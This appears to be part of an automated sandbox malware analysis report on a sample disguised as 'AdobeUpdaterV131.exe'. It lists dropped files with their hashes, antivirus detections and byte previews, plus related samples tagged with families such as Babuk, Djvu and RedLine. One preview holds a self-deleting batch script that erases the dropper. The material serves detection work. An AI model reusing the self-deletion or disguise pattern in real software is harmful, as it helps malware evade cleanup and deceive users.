                      AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                        aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                          ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exeGet hashmaliciousBdaejecBrowse
                            7Y18r(224).exeGet hashmaliciousBdaejecBrowse
                              A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exeGet hashmaliciousBdaejec, RedLineBrowse
                                A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                  A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19456
                                    Entropy (8bit):6.591411463821307
                                    Encrypted:false
                                    SSDEEP:384:1FqSTXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:bNQGPL4vzZq2o9W7GsxBbPr
                                    MD5:B4BF7F8D489E0DE938987E026D2E8436
                                    SHA1:FB2C2C141E60B33DBB4FFA5F2F96C1DD357087DE
                                    SHA-256:B4CE1CAD5BE1FD43F14329BC26B687B281045961431BFEA2D5B0CF5718BAA66B
                                    SHA-512:96BE63F3ACD4B1C814AD0BA04781C6F8CD5855C0A0ACC0E6707580409AB03631BA1FE630BF441FB789B3A264D10DF3E7338EE3F00451C9929F338F2D4A62F655
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Reputation:low
                                    Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):2389504
                                    Entropy (8bit):6.731348551534886
                                    Encrypted:false
                                    SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                    MD5:4F1A3411233274894B2999C28CE14A10
                                    SHA1:CC8AB1616ACD5F14532236FF4615E29CF52268BF
                                    SHA-256:FE619629371658FEAB5E59B3CE22E9509CC4F311F0C49851853686E417BF4FB7
                                    SHA-512:98A2AEC5D4065CC3B925C067F6D019F32121B7648CD647D99CC1EBF5C9177DBAB98DB5FDBAAC9E77CFF49B554D162D8FACEB26E63236AF056845CC1E08094046
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):31744
                                    Entropy (8bit):6.36664593232107
                                    Encrypted:false
                                    SSDEEP:768:uWQ3655Kv1X/qY1MSdUGQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdUdGCq2iW7z
                                    MD5:EC0D55ED19B8ADB7BC0BEB7F54AFA442
                                    SHA1:E6D188D048B2ADF30E9817740F3790AA9D13038F
                                    SHA-256:5111B800FAB76BF2BB4349AA0065F06D353AC1672826CD43542A104648A8E307
                                    SHA-512:E7731F2D7AFA787B352E5CFF308FE81CA8D554F8CEA4454B6B368E4D553E78B0EDD1AB73AF55229D44F016087AD78D99F9B38D2E7D51BAAE87D95D2301D4316D
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):2342912
                                    Entropy (8bit):7.956902857826616
                                    Encrypted:false
                                    SSDEEP:49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
                                    MD5:0BFB030DCBF461F2C76087E4B9856836
                                    SHA1:75425A8DC79A21373520A241A7C51D9A1CE7E91A
                                    SHA-256:BDB5F42B5E4709134A4F963B9648AF4F8E19E2011937F72FF3B75488887E3F14
                                    SHA-512:618971540126EF2759BD98E1DF88C2460A5D180994E5E709289889BDCB877E02C34859AC07051BF1E6C158FF5D51F58D1E9E49A44759762AA959854671F67F50
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........Z...........@..........................PZ...........@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..+.........................@...czumqxku.P...p?..J..................@...oiivdxoz......Y......X#.............@....taggant.0....Y.."...\#.............@.....u...P....Z..B...~#............. ...........................................................................................................................................................
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.0754025759754307
                                    Encrypted:false
                                    SSDEEP:96:rib8F/mfbrVsfhnt7afzQXIDcQCc6KkcEXcw3N+HbHg/1AnQECaVDPCoLnNfoU+3:dEfbrVq08rtujICBpOtzuiF0Z24IO8N
                                    MD5:CAED3DD1817C731DE1FCDFB62908D16B
                                    SHA1:FC1C4798FA4D46D93DDD8C755674F9DD7BFDAC9A
                                    SHA-256:BD01B3BDFF63013A65F24BBDD90B6189D275225589C8B057B51D5835A1A3EF39
                                    SHA-512:876681B470290A8C0B7AEB1661253AB543ABFF49F0DCCFAEAEA364304C9B9CA7F54D1EC477298A9AC0B842731D2BBDFD322CE53E9A3543756CEBA21D3FCE308B
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.8.5.1.9.0.3.6.0.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.8.5.1.9.9.2.6.7.0.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.d.8.c.b.9.5.-.f.6.f.1.-.4.f.8.d.-.a.b.f.3.-.a.6.2.9.1.0.f.1.7.1.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.f.5.5.5.a.d.-.1.8.2.c.-.4.1.6.3.-.b.9.8.8.-.5.e.7.b.7.8.2.c.7.9.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.R.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.8.-.0.0.0.1.-.0.0.1.4.-.5.5.8.f.-.a.f.b.5.0.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.8.9.e.5.5.5.3.1.c.2.7.f.e.9.9.c.6.b.9.2.4.8.4.f.6.9.3.d.0.0.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.x.R.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1././.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 21:01:59 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):165350
                                    Entropy (8bit):1.9187217692269503
                                    Encrypted:false
                                    SSDEEP:384:EhL07bH9A/curaL354oLT/18tXH1mtAd2Ff5yJU61xAThAy3OYSYyMMDUi3M:sQn9Az+z5XndOXktJCJA9YYSJMcM
                                    MD5:0C0BC083D687B555F8E5393D86885B93
                                    SHA1:9EA5722CBEB3A9F633A3E9612ACB9F945C4CC75D
                                    SHA-256:1DD1DC0BF944222F1E257ED248BBD461387A477E3E812B05AD4468966B6D18F0
                                    SHA-512:4A66074728501B80C4869C6CA363EF7B4370DFE1A2FF70F6EA465CC6EE3678B9F5F667E2E3C1BE770F561F5EFE533E25481692BB1CC642433CD3CF12EEA6FC71
                                    Malicious:false
                                    Preview:MDMP..a..... ........k.f............t.......................$....'......d....Y..........`.......8...........T............B...C..........8'..........$)..............................................................................eJ.......)......GenuineIntel............T............k.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8270
                                    Entropy (8bit):3.699032888137261
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJ+26s6Y13Q6e3tjpgmfGIpDj89bxgsf1bm:R6lXJ/6s6Yi6ugmfGhxzfU
                                    MD5:11ECF30D07BF1131EE257B59A22541FB
                                    SHA1:6136BFEBDF32D01DB0C797FEBAFA3D811F69B447
                                    SHA-256:A31D826AAE80AFC3EA10AA1B0AA071DC9D777D9C5A491B0C51C19108DE56D696
                                    SHA-512:1D8621E5E4259F004CB25558EE087CA79A0D2FB68FE3D5961CF61FE0ED8F68570AD3E77BDE41173CC8F7D6AAEE083EDD4326DD082E2A6B3DB7E1190923712293
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.8.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4530
                                    Entropy (8bit):4.43776551631157
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zssJg77aI925WpW8VY/vYm8M4J8VFe3P+q8wMc4g5Vd:uIjfqI7II7VMyJz/b4g5Vd
                                    MD5:4B6C8372CEC13A50FA5E40F9BD0EBC5E
                                    SHA1:D322D9D079286DA9F2F4440DD0607A7C93098FED
                                    SHA-256:ED275317E5A29B4E371C814E949322C99256EED3B59D61F817314F9896D6BAA5
                                    SHA-512:A9AE6010E1CB610C19376E82326BA8890E04A1E0B0186D35C3D49EA1654DA54FF4CD2B2F0FA14841CBAA768BAB44631F8CA3EB5D8ACEB89C6646A2A9B0D12BEB
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425524" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):2342912
                                    Entropy (8bit):7.956902857826616
                                    Encrypted:false
                                    SSDEEP:49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
                                    MD5:0BFB030DCBF461F2C76087E4B9856836
                                    SHA1:75425A8DC79A21373520A241A7C51D9A1CE7E91A
                                    SHA-256:BDB5F42B5E4709134A4F963B9648AF4F8E19E2011937F72FF3B75488887E3F14
                                    SHA-512:618971540126EF2759BD98E1DF88C2460A5D180994E5E709289889BDCB877E02C34859AC07051BF1E6C158FF5D51F58D1E9E49A44759762AA959854671F67F50
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........Z...........@..........................PZ...........@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..+.........................@...czumqxku.P...p?..J..................@...oiivdxoz......Y......X#.............@....taggant.0....Y.."...\#.............@.....u...P....Z..B...~#............. ...........................................................................................................................................................
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):181
                                    Entropy (8bit):4.885447685885741
                                    Encrypted:false
                                    SSDEEP:3:jdKZOt+kiE2J5xAI4bMD2Ut+kiE2J5xAI41KReJsjIdKZOt+kiE2J5xAIgzn:jdKowkn23f4bMD2Uwkn23f41/dKowknl
                                    MD5:80FDEC7E8861E6F821E435F038F3004A
                                    SHA1:36B8B06AA9FF5474F2ED0F3440367CD82A015AD4
                                    SHA-256:B2C2E6F5CCE475453BC666099E014975B129580CC06EA26272BC67877D333C12
                                    SHA-512:609DE06C428B4F1B410DB2E9BC1199A7D32F6D497622F932A19F30B794F63E07159B2C333F642690C5315E474A016F3725A4802270366CAC82A82B13EAD689D9
                                    Malicious:false
                                    Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\xRp.exe"..if exist "C:\Users\user\AppData\Local\Temp\xRp.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\0be11806.bat"..
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:modified
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):1.5
                                    Encrypted:false
                                    SSDEEP:3:Nv:9
                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                    Malicious:false
                                    Preview:foo.
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:modified
                                    Size (bytes):13
                                    Entropy (8bit):3.0269868333592873
                                    Encrypted:false
                                    SSDEEP:3:LERUROn:2UROn
                                    MD5:2FBF213FEFE5CD3A597F58B207EAC447
                                    SHA1:6F84A117C3E6E1650C8957834B5671887AE647C7
                                    SHA-256:A60FAA8D9A81C78C0ED530E500E55B630E92529AD9A2BF226FA635591BCF251B
